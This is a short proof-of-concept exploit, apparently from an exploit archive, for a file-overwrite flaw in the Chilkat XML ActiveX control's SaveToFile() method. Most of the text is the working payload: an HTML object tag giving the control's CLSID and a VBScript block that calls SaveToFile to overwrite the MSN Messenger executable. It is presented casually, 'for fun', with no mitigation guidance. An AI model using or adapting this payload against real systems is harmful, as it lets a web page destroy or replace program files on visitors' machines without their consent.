Chilkat XML ActiveX File overwriting vulnerability PoC(on msn.exe) for fun

Discovered by: shinnai
PoC by: e.wiZz!

In the wild...



File: ChilkatUtil.dll <= 3.0.3.0
CLSID: {5022FAE8-B780-4B78-B8DC-1AF1145A4F42}
ProgID: ChilkatUtil.CkData.1
Descr.: Chilkat CkData

Vulnerable function SaveToFile()

PoC:

<object classid='clsid:5022FAE8-B780-4B78-B8DC-1AF1145A4F42' id='target' />
<script language='vbscript'>

'Wscript.echo typename(target)

targetFile = "C:\Program Files\Chilkat Software Inc\Chilkat XML ActiveX\ChilkatUtil.dll"
prototype  = "Function SaveToFile ( ByVal filename As String ) As Long"
memberName = "SaveToFile"
progid     = "CHILKATUTILLib.CkData"
argCount   = 1

arg1="C:\Program Files\MSN Messenger\msnmsgr.exe"

target.SaveToFile arg1 

</script>